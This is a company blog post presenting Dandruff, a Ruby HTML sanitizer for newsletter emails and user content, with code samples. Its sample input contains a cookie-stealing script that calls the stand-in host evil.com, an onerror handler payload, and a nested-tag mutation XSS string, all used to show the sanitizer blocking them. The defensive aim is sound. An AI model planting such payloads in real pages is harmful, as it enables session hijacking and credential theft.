At KUY.io, we build tools that empower users and businesses to communicate effectively. In our own productivity tools and our custom marketing automation tools, we often find ourselves handling user-generated content. A common requirement we encounter is allowing our communications team to design and send outreach and newsletter emails using HTML markup. For you, it may be other kinds of user-created content, like comments on blog posts.

Giving users the power to express themselves in HTML is a double-edged sword. On one side, it offers creative freedom; on the other, it opens the door to a host of security vulnerabilities. To tackle this, we built Dandruff, a robust HTML sanitizer designed to keep your applications clean and secure.

The Importance of Sanitizing External HTML

When you allow users to input text that ends up being rendered in a browser - or worse, in a customer's email client - you are effectively entrusting your reputation to that input. HTML is expressive, but it wasn't designed with "untrusted input" as a default safety setting.

Sanitization is the process of taking that untrusted markup, parsing it, and stripping out anything that could be harmful while preserving the formatting that the user intended. It sounds simple, but the line between "rich text" and "malicious payload" is often thinner than you think.

Bad Things Could Happen

If you render raw HTML from a user without sanitizing it, you are vulnerable to Cross-Site Scripting (XSS). This is the big one. An attacker could inject a <script> tag or attach an onload or onerror event handler to an image. When your other users (or your own admins) view this content, that script executes in their browser with your domain's privileges.
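
To make the risk concrete, here is a minimal sketch in plain Ruby, with no Dandruff involved. The comment string and the surrounding <div> are made up for illustration. It shows that interpolating user input straight into a page keeps the event handler intact, while escaping it with the standard library's ERB::Util.html_escape neutralizes the payload at the cost of all formatting.

```ruby
require 'erb'

# Hypothetical user-submitted comment carrying an event-handler payload.
comment = %q(<img src="x" onerror="alert('XSS')">)

# Unsafe: the markup is interpolated verbatim, so a browser would run the handler.
unsafe_page = %(<div class="comment">#{comment}</div>)

# Escaped: every special character becomes an entity, so nothing executes,
# but the user also loses any legitimate formatting.
escaped_page = %(<div class="comment">#{ERB::Util.html_escape(comment)}</div>)

puts unsafe_page
puts escaped_page
```

Escaping is the right tool when users should never write markup at all. When they should, as with email templates, you need something that keeps the safe parts and drops the rest.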

The consequences include:

  • Session Hijacking: Stealing cookies and taking over admin accounts.
  • Phishing: Injecting fake login forms to steal credentials.
  • Defacement: Altering the look of your application to spread misinformation.

For email specifically, broken HTML can also destroy the layout of your marketing campaigns, making your brand look unprofessional. A missing closing </div> or a rogue <style> tag can wreak havoc on an inbox.

Existing Solutions

The Ruby ecosystem has some great tools for this. Loofah and Sanitize are the heavy hitters. They are battle-tested and we have used them for years.

However, we found that existing solutions often force you into a binary choice:

  1. Too Strict: They strip out everything, including the <table> structures and inline style attributes that are absolutely critical for rendering HTML emails correctly across Outlook, Gmail, and Apple Mail.

  2. Too Permissive: Enabling "relaxed" modes often opens up vectors we didn't intend to allow, requiring verbose configuration files to lock things back down.

We needed something that was secure by default but understood the nuances of formatted content like marketing emails.

Why We Built Dandruff

We ended up creating Dandruff because we wanted a sanitizer that treats "cleaning up" as a first-class citizen. It is built on top of a battle-proven library with a strong security model.

Dandruff is designed to:

  • Preserve Email Layouts: It understands that <table>, <tr>, and <td> are not just data structures but layout tools in the email world.
  • Smart Style Allow-listing: Instead of stripping all CSS, Dandruff allows you to safely permit specific CSS properties (like color, font-size, text-align) while blocking dangerous ones (like position: fixed or behavior).
  • Performance: It uses a highly efficient parsing strategy to handle large marketing templates without bogging down your background job queues.
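
The style allow-listing idea can be sketched in a few lines of plain Ruby. This illustrates the technique only and is not Dandruff's implementation: the ALLOWED_PROPERTIES set, the UNSAFE_VALUE pattern, and the filter_style helper are all assumptions made for the example, and splitting on ";" is deliberately naive.

```ruby
require 'set'

# Hypothetical allow-list; a real one would be tuned to your email templates.
ALLOWED_PROPERTIES = Set['color', 'background-color', 'font-size', 'text-align', 'padding'].freeze

# Values that can pull in external resources or script are rejected outright.
UNSAFE_VALUE = /url\s*\(|expression\s*\(|javascript:/i

# Keeps only allow-listed declarations from an inline style string.
def filter_style(style)
  kept = style.split(';').filter_map do |declaration|
    property, value = declaration.split(':', 2).map(&:strip)
    next if property.nil? || property.empty? || value.nil? || value.empty?
    next unless ALLOWED_PROPERTIES.include?(property.downcase)
    next if value.match?(UNSAFE_VALUE)

    "#{property.downcase}: #{value}"
  end
  kept.join('; ')
end

puts filter_style('color: #333; position: fixed; behavior: url(x.htc); text-align: center')
# prints: color: #333; text-align: center
```

The point of the allow-list direction is that unknown properties are dropped by default, so a new or obscure CSS feature cannot slip through just because nobody thought to block it.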

We named it Dandruff because it gets rid of the flaky, unwanted bits in your code, leaving you with a clean, healthy head of... well, HTML.

Using Dandruff

Let's look at a real-world example. You have a newsletter email feature where your marketing teams can submit a template. You want to allow them to style their text and use tables, but you absolutely want to block any JavaScript.

Here is how you would use Dandruff to sanitize that payload.

require 'dandruff'

# A potentially malicious payload provided by a user
user_input = <<~HTML
  <div style="background-color: #f0f0f0; padding: 20px;">
    <h1 style="color: #333;">Welcome to Our Newsletter!</h1>
    <p>Check out our latest deals.</p>

    <img src="x" onerror="alert('Stealing your cookies!')" />

    <table border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td><a href="https://example.com">Click Here</a></td>
      </tr>
    </table>

    <script>fetch('https://evil.com/steal?data=' + document.cookie)</script>
  </div>
HTML

# Sanitize it with Dandruff using the email profile
safe_html = Dandruff.clean(user_input, profiles: [:html_email])

puts safe_html

Output:

<div style="background-color: #f0f0f0; padding: 20px;">
  <h1 style="color: #333;">Welcome to Our Newsletter!</h1>
  <p>Check out our latest deals.</p>

  <img src="x">

  <table border="0" cellpadding="0" cellspacing="0">
    <tr>
      <td><a href="https://example.com">Click Here</a></td>
    </tr>
  </table>

  </div>

Dandruff surgically removed the onerror attribute and the <script> tag, but preserved the inline styles and table structure necessary for the email to render correctly.
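
If you want a cheap regression check around a call like this, one option is to assert on the sanitized string in your own test suite. The helper below is hypothetical: leftover_risks and its patterns are not part of Dandruff, and the sample strings are taken from the example above. Treat it as a tripwire for tests rather than a sanitizer, since regular expressions cannot parse HTML reliably and may produce false positives.

```ruby
# Hypothetical patterns that should never survive sanitization.
RISK_PATTERNS = {
  script_tag: /<script\b/i,
  event_handler: /\son[a-z]+\s*=/i,
  javascript_url: /javascript:/i
}.freeze

# Returns the names of all patterns found in the given HTML string.
def leftover_risks(html)
  RISK_PATTERNS.select { |_name, pattern| html.match?(pattern) }.keys
end

dirty = %q(<img src="x" onerror="alert('Stealing your cookies!')" />)
clean = '<img src="x">'

p leftover_risks(dirty) # prints [:event_handler]
p leftover_risks(clean) # prints []
```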

The test suite for Dandruff contains hundreds of examples of common attack vectors, from simple JavaScript on* event-handler attacks to sophisticated mutation-based XSS attacks. The latter only trigger when a sanitizer removes supposedly unclean pieces and, in doing so, inadvertently assembles the malicious code through the cleaning operation itself.
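
The simplest form of this "assembled by cleaning" problem can be reproduced with a toy sanitizer in plain Ruby. Both helpers below are hypothetical and written only for this illustration; neither reflects how Dandruff works, and the payload is a textbook example rather than one taken from its test suite. Real mutation-based XSS also involves the browser re-parsing markup in surprising ways, which this sketch does not cover.

```ruby
# Toy sanitizer: deletes script tags in a single pass. Do not use this.
def naive_strip(html)
  html.gsub(/<script>/i, '').gsub(%r{</script>}i, '')
end

# Slightly better toy: repeats the pass until the output stops changing.
def strip_until_stable(html)
  loop do
    stripped = naive_strip(html)
    return stripped if stripped == html

    html = stripped
  end
end

payload = '<scr<script>ipt>alert(1)</scr</script>ipt>'

puts naive_strip(payload)        # prints <script>alert(1)</script>
puts strip_until_stable(payload) # prints alert(1)
```

The single pass removes the inner tags and, in doing so, glues the outer fragments into a working <script> element. Looping until the output is stable fixes this particular payload, but string-level stripping remains fragile, which is why a parser-based sanitizer with a broad attack-vector test suite is the safer choice.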

Check out the project on GitHub at github.com/kuyio/dandruff and let us know how you keep your HTML clean!